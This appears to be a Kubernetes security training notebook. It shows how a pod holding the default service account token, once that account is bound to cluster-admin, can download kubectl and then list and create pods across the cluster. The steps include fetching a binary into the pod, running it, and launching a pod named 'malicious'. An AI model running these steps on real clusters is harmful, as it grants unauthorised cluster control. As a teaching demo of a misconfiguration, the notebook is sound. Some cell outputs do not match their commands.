**This notebook covered by the following [license](License.ipynb)  This note must not be removed**

# NGinx unprivileged

We are using the [vendors original recipe](https://hub.docker.com/r/nginxinc/nginx-unprivileged), should be save ☠️



In [1]:
kubectl apply -f - <<EOF
apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx-strict
  labels:
    app: nginx-strict
spec:
  replicas: 3
  selector:
    matchLabels:
      app: nginx-strict
  template:
    metadata:
      labels:
        app: nginx-strict
    spec:
      containers:
      - name: nginx
        image: nginxinc/nginx-unprivileged
        ports:
        - containerPort: 8080
EOF

deployment.apps "nginx-strict" deleted


In [2]:
kubectl get pods

NAME                                      READY   STATUS              RESTARTS   AGE
nginx-strict-5cdc48cf55-22svs             0/1     ContainerCreating   0          3s
nginx-strict-5cdc48cf55-nn2kk             0/1     ContainerCreating   0          3s
nginx-strict-5cdc48cf55-tfhv4             0/1     ContainerCreating   0          3s
nginx-with-token-again-66868cff8b-24zjt   1/1     Running             0          41m


In [9]:
kubectl apply -f - <<EOF
apiVersion: v1
kind: Service
metadata:
  name: nginx-strict
  namespace: default
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 8080
  selector:
    app: nginx-strict
  sessionAffinity: None
  type: LoadBalancer
EOF

service "nginx-strict" deleted


In [5]:
kubectl get svc

NAME           TYPE           CLUSTER-IP      EXTERNAL-IP     PORT(S)        AGE
kubernetes     ClusterIP      10.96.0.1       <none>          443/TCP        43m
nginx-strict   LoadBalancer   10.106.48.229   10.106.48.229   80:31767/TCP   27s


In [ ]:
kubectl get svc nginx-strict  

In [6]:
curl 10.106.48.229

<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
html { color-scheme: light dark; }
body { width: 35em; margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif; }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>


In [ ]:
kubectl get svc nginx-strict -o yaml

In [7]:
kubectl delete deployment my-nginx

Error from server (NotFound): deployments.apps "my-nginx" not found


: 1

In [ ]:
kubectl delete service my-nginx

In [ ]:
kubectl get pods -o jsonpath='{.items[0].metadata.name}' 

In [ ]:
POD=$(kubectl get pods -o jsonpath='{.items[0].metadata.name}' | grep nginx-strict)
echo $POD

In [ ]:
kubectl exec $POD --  curl -L -o /tmp/kubectl https://dl.k8s.io/release/v1.20.0/bin/linux/amd64/kubectl

In [ ]:
kubectl exec $POD -- ls /tmp

In [ ]:
kubectl exec $POD -- chmod +x /tmp/kubectl

In [ ]:
kubectl exec $POD -- /tmp/kubectl

In [ ]:
kubectl exec $POD -- /tmp/kubectl get pods 

In [ ]:
kubectl exec $POD  -- df

In [ ]:
kubectl get serviceaccounts -A

#  💀 💀 💀 💀 💀 💀 💀 💀 💀
# 💀 💀 **Never Ever** 💀 💀 💀 
#  💀 💀 💀 💀 💀 💀 💀 💀 💀


In [ ]:
kubectl create clusterrolebinding cluster-admin-binding --clusterrole cluster-admin --serviceaccount default:default

In [ ]:
kubectl exec $POD -- /tmp/kubectl get pods -A

In [ ]:
kubectl exec $POD -- /tmp/kubectl run malicious --image=nginx

In [ ]:
kubectl get pod

In [ ]:
kubectl exec $POD -- /tmp/kubectl delete pod malicious 

In [ ]:
kubectl get clusterroles

In [ ]:
kubectl get clusterrolebindings

In [ ]:
kubectl get clusterrolebindings cluster-admin-binding  -o yaml

In [ ]:
kubectl get clusterrolebindings -o jsonpath='{.items[*].subjects[*].name}' | grep --color=always default

In [ ]:
kubectl get clusterrolebindings -o jsonpath='{range .items[*]}{.metadata.name}{":\t"}{.roleRef.name}{" --> "}{ range.subjects[*]}{.namespace}{":"}{.name}{end}{"\n"}{end}' | grep --color=always -E '$|default|cluster-admin'

In [ ]:
kubectl get rolebindings -A -o jsonpath='{range .items[*]}{.metadata.namespace}{":"}{.metadata.name}{":\t"}{.roleRef.name}{" --> "}{ range.subjects[*]}{.namespace}{":"}{.name}{end}{"\n"}{end}' | grep --color=always -E '$|default|cluster-admin'

[removing the serviceaccount token from the container](ServiceAccountToken.ipynb)

[Endless Discussion](https://github.com/kubernetes/kubernetes/issues/57601#issuecomment-353824159)

# Cleanup

In [ ]:
kubectl delete clusterrolebinding cluster-admin-binding